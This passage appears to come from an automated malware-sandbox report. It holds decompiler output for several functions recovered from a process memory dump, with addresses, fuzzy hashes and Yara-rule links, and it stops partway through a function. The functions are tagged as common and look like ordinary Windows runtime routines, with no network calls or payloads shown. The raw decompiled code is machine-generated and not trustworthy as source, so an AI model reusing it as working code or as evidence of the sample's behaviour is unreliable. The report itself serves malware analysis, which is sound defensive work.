0x03634a4d
0x03634a51
0x03634a9c
0x00000000
0x00000000
0x03634aa3
0x03634aa8
0x03634aad
0x03634ab1
0x03634ade
0x03634ae3
0x03634a5a
0x03634a62
0x03634a6a
0x03634a6e
0x0366f203
0x03634a84
0x03634a88
0x03634a89
0x03634a8a
0x03634a95
0x03634a95
0x03634a79
0x03634a80
0x03634af2
0x03634af4
0x03634af9
0x03634aff
0x03634b01
0x03634b03
0x03634b08
0x0366f20a
0x0366f212
0x0366f216
0x0366f216
0x03634b08
0x03634b13
0x03634b1a
0x0366f229
0x0366f229
0x03634b1a
0x03634a82
0x00000000
0x03634a82
0x03634ab7
0x03634acd
0x03634acd
0x03634ad5
0x03634ada
0x00000000
0x03634ada
0x03634ac2
0x03634acb
0x00000000
0x00000000
0x00000000
0x03634acb
0x03634a53
0x03634a53
0x03634a58
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09182b9b58aa470aa9207a0b6ca7624f68d6fa657ee671e72ded8e3c5ad4d695
Instruction ID: dbb07f335173588afcd583ac6668dbe280bfa611cb38f1f0137eb6dc13f5e6fe
Opcode Fuzzy Hash: 09182b9b58aa470aa9207a0b6ca7624f68d6fa657ee671e72ded8e3c5ad4d695
Instruction Fuzzy Hash: 783102362063549FC732DF55CA46B2BFBA8FF82B10F08046DE8664B245DBB0D804CB89

Uniqueness

Uniqueness Score: -1.00%

Function 03638EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03638EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x36ed360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03624E70(0x36e86e4, 0x3639490, 0, 0);
					if( *0x36e53e8 > 5 && E03638F33(0x36e53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x36e53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x36e53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x35dbc46;
						_t48 = E03677B9C(0x36e53e8, 0x35dbc46, _t67, 0x36e53e8, _t70,  &_v140);
					}
				}
				return E0363B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x03638ec7
0x03638ed9
0x03638edc
0x03638ee6
0x03638ee9
0x03638eee
0x03638efc
0x03638f08
0x03671349
0x03671353
0x0367135d
0x03671366
0x0367136f
0x03671375
0x0367137c
0x03671385
0x03671390
0x03671391
0x0367139c
0x0367139d
0x036713a6
0x036713ac
0x036713b2
0x036713b5
0x036713bc
0x036713bf
0x036713c2
0x036713c5
0x036713c8
0x036713cb
0x036713ce
0x036713d1
0x036713d4
0x036713d7
0x036713da
0x036713dd
0x036713e0
0x036713e3
0x036713e6
0x036713e9
0x036713f6
0x03671400
0x03671400
0x03638f08
0x03638f32

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13add61e770f4ce7469f14da470bc429a6575b22a277a2a33f397606c2afc723
Instruction ID: ab8c4f1aae17c545f0805975f37f8327829af598340a8d14b75933cd36555401
Opcode Fuzzy Hash: 13add61e770f4ce7469f14da470bc429a6575b22a277a2a33f397606c2afc723
Instruction Fuzzy Hash: 8741A1B5D0031C9EDB20CFAAD980AADFBF4FB49710F5041AEE519A7600EB749A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0362E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0362E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03639670() < 0) {
					L0364DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x36e7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03614620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0362E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0362e730
0x0362e736
0x0362e738
0x0362e73d
0x0362e73e
0x0362e740
0x0362e749
0x0362e765
0x0362e76a
0x0362e76b
0x0362e76c
0x0362e76d
0x0362e76e
0x0362e76f
0x0362e775
0x0362e777
0x0362e77e
0x0366b675
0x0362e784
0x0362e784
0x0362e789
0x0362e7a8
0x0362e7ac
0x0362e807
0x0362e7ae
0x0362e7ae
0x0362e7b1
0x0362e7b4
0x0362e7b9
0x0362e7c0
0x0362e7c4
0x0362e7ca
0x0362e7cc
0x00000000
0x0362e7d3
0x0362e7d6
0x00000000
0x00000000
0x0362e7ff
0x0362e802
0x00000000
0x00000000
0x0362e7f9
0x0362e7fc
0x00000000
0x00000000
0x0362e7f3
0x0362e7f6
0x00000000
0x00000000
0x0362e7ed
0x0362e7f0
0x00000000
0x00000000
0x0362e7e7
0x0362e7ea
0x00000000
0x00000000
0x0366b685
0x0366b688
0x00000000
0x00000000
0x0366b682
0x00000000
0x00000000
0x0362e7cc
0x0362e7d9
0x0362e7dc
0x0362e7de
0x0362e7de
0x0362e7ac
0x0362e7e4
0x0362e74b
0x0362e751
0x0362e759
0x0362e761
0x0362e761

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2764ec6a5c27764f18ead7b6b8cfb8d891244376067b01c94740feb83594c11
Instruction ID: 3732424d6a26cce6c678174c06ff2b1a544588467524ceede029c05dea7df805
Opcode Fuzzy Hash: c2764ec6a5c27764f18ead7b6b8cfb8d891244376067b01c94740feb83594c11
Instruction Fuzzy Hash: B8319E75A14649EFD744CF68C844F9ABBE4FB09314F15826AF904CB341D632EC90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0362BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0362BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x36e6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03612280(0xd, 0x1127f1a0);
				_t41 =  *0x36e60f8; // 0x0
				if(_t41 != 0) {
					 *0x36e60f8 =  *_t41;
					 *0x36e60fc =  *0x36e60fc + 0xffff;
				}
				E0360FFB0(_t41, 0x800, 0x1127f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x36e60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03614620(0x36e6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x36e6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0362bc36
0x0362bc42
0x0362bc45
0x0362bc4a
0x0362bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0362bc50
0x0362bc50
0x0362bc58
0x0362bc5a
0x0362bc60
0x00000000
0x00000000
0x0366a4f2
0x0366a4f6
0x00000000
0x00000000
0x00000000
0x0366a4fc
0x0362bc79
0x0362bc7e
0x0362bc86
0x0362bd16
0x0362bd20
0x0362bd20
0x0362bc8d
0x0362bc94
0x0362bcbd
0x0362bcca
0x0362bccb
0x0362bccc
0x0362bccd
0x0362bcce
0x0362bcd4
0x0362bcea
0x0362bcee
0x0362bcf2
0x0362bd00
0x0362bd04
0x00000000
0x0362bc96
0x0362bcab
0x0362bcaf
0x0362bd2c
0x0362bd2c
0x0362bd09
0x00000000
0x0362bd09
0x0362bcb1
0x0362bcb5
0x0362bcbb
0x00000000
0x00000000
0x00000000
0x0362bcbb

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1bc5f54c1746ea2feef43a7227d792a5a364f62c199951670612f6b2ad8e54
Instruction ID: 4eeb9b301408cf9e5f2baef19bba1e2bf27a353d50dd9fc6056c3b6fd271f4f7
Opcode Fuzzy Hash: ab1bc5f54c1746ea2feef43a7227d792a5a364f62c199951670612f6b2ad8e54
Instruction Fuzzy Hash: 2031E176A00A259BCB11EF58C5807E67BA4EB29311F1A0879ED44DF309EB74D9098F94

Uniqueness

Uniqueness Score: -1.00%

Function 035F9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E035F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x36cf6e8);
				E0364D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E036C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0364D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x36e86c0; // 0xfa07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x36e86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03612280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E036C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0363AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x36eb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x36e84c0;
										if(_t69 >=  *0x36e84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E036C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E035F922A(_t82);
							_t53 = E03617D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E036C8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x36e86c0; // 0xfa07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x36e86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x36e86bc;
										_t72 = 0x36e86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E035F9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x36e86c4;
									_t72 = 0x36e86c0;
									L18:
									E03629B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x035f9100
0x035f9100
0x035f9100
0x035f9100
0x035f9102
0x035f9107
0x035f910c
0x035f9110
0x035f9115
0x035f9136
0x035f9143
0x036537e4
0x036537e4
0x035f9149
0x035f914e
0x035f914e
0x035f9117
0x035f911d
0x00000000
0x00000000
0x035f911f
0x035f9125
0x00000000
0x035f9151
0x035f9158
0x035f915d
0x035f9161
0x035f9168
0x03653715
0x00000000
0x035f916e
0x035f916e
0x035f9175
0x035f9177
0x035f917e
0x035f917f
0x035f9182
0x035f9182
0x035f9187
0x035f9187
0x035f918a
0x035f918d
0x035f918f
0x035f9192
0x035f9195
0x035f9198
0x035f9198
0x035f9198
0x035f919a
0x00000000
0x00000000
0x0365371f
0x03653721
0x03653727
0x0365372f
0x03653733
0x03653735
0x03653738
0x0365373b
0x0365373d
0x03653740
0x00000000
0x00000000
0x03653746
0x03653749
0x00000000
0x00000000
0x0365374f
0x03653751
0x00000000
0x00000000
0x03653757
0x03653759
0x0365375c
0x0365375c
0x0365375e
0x0365375e
0x03653761
0x03653764
0x00000000
0x00000000
0x03653766
0x03653768
0x036537a3
0x036537a3
0x036537a5
0x036537a7
0x036537ad
0x036537b0
0x036537b2
0x036537bc
0x036537c2
0x036537c2
0x036537b2
0x035f9187
0x035f9187
0x035f918a
0x035f918d
0x035f918f
0x035f9192
0x035f9195
0x00000000
0x035f9195
0x00000000
0x035f9187
0x0365376a
0x0365376a
0x0365376c
0x0365376c
0x0365376f
0x03653775
0x00000000
0x00000000
0x03653777
0x03653779
0x00000000
0x00000000
0x03653782
0x03653787
0x03653789
0x03653790
0x03653790
0x0365378b
0x0365378b
0x0365378b
0x03653792
0x03653795
0x03653795
0x03653798
0x03653798
0x0365379b
0x0365379b
0x035f91a3
0x035f91a9
0x035f91b0
0x035f91b4
0x035f91b4
0x035f91bb
0x035f91c0
0x035f91c5
0x035f91c7
0x036537da
0x035f91cd
0x035f91cd
0x035f91cd
0x035f91d2
0x035f91d5
0x035f9239
0x035f9239
0x035f91d7
0x035f91db
0x035f91e1
0x035f91e7
0x035f91fd
0x035f9203
0x035f921e
0x035f9223
0x00000000
0x035f9223
0x035f9205
0x035f9208
0x035f920c
0x035f9214
0x035f9214
0x035f91e9
0x035f91e9
0x035f91ee
0x035f91f3
0x035f91f3
0x035f91f3
0x035f91e7
0x00000000
0x035f91db
0x035f9187
0x035f9168

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3a3ce9c16a75341a468b3d6eb540ae93ae2c7227d5aa102c1dd222167f6d5b
Instruction ID: d802972ea505984204f96d587119763333c140f45d1e5ee93635ca666ed53c5e
Opcode Fuzzy Hash: fd3a3ce9c16a75341a468b3d6eb540ae93ae2c7227d5aa102c1dd222167f6d5b
Instruction Fuzzy Hash: 7F31D375E01B85DFDB25EF68D048FACBBB1BB88750F188169D5046B361C330A984CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03621DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E03621DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0361F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03614620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0361F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x03621dc2
0x03621dc5
0x03621dc7
0x03621dcc
0x03621dce
0x03621dd6
0x03621ddf
0x03621de0
0x03621de1
0x03621de5
0x03621de8
0x03621def
0x03621df0
0x03621df6
0x03621df7
0x03621dfe
0x03621e1a
0x00000000
0x00000000
0x03621e0b
0x03621e12
0x03621e12
0x03621e00
0x03621e00
0x03621e05
0x03621e1e
0x03621e23
0x0366570f
0x03665713
0x00000000
0x00000000
0x03665719
0x03665719
0x03621e2c
0x03621e2d
0x03621e2e
0x03621e2f
0x03621e31
0x03621e32
0x03621e35
0x03621e3d
0x03665723
0x0366573d
0x0366573d
0x00000000
0x03665723
0x03621e49
0x03621e4e
0x03621e4e
0x03621e09
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 63b4320cd14b3c6fa127704333168a9ba660f0ff76579958f97fd0ff4eda61d2
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: BC21A376604629EFC711CF59CD80E6BFFBDEF86650F164055E545AB210D630AD11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03610050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E03610050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x36ed360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03629ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0363B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E036C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03629702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x36eb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x03610055
0x0361005d
0x03610062
0x0361006c
0x0361006f
0x03610074
0x0361007a
0x0361007a
0x03610080
0x03610080
0x03610087
0x0361008d
0x0361008f
0x03610093
0x03610095
0x0361009b
0x036100f8
0x036100fb
0x036100fc
0x036100ff
0x03610108
0x03610108
0x036100a2
0x036100a6
0x036100b3
0x036100bc
0x036100c5
0x036100ca
0x0365c01e
0x00000000
0x00000000
0x0365c02d
0x036100d5
0x036100d9
0x0365c03d
0x0365c046
0x0365c046
0x036100df
0x036100e2
0x036100ea
0x036100ef
0x036100f2
0x036100f6
0x03610111
0x03610117
0x03610117
0x00000000
0x036100f6
0x036100d0
0x036100d0
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1090fab7edd9cfe8aa6bfc9edbea3014ecc525cff9c0bfa5dbcf813d1ea288f
Instruction ID: eb3a8c8ceabda93dad26fd4dd1baa11fd9a330352ee0b86985aa468617a6c2e7
Opcode Fuzzy Hash: e1090fab7edd9cfe8aa6bfc9edbea3014ecc525cff9c0bfa5dbcf813d1ea288f
Instruction Fuzzy Hash: 3F31CE31201B04CFDB21CF28C940BAAB7E5FF89714F18456DE4968BB90EB76A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03676C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03676C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
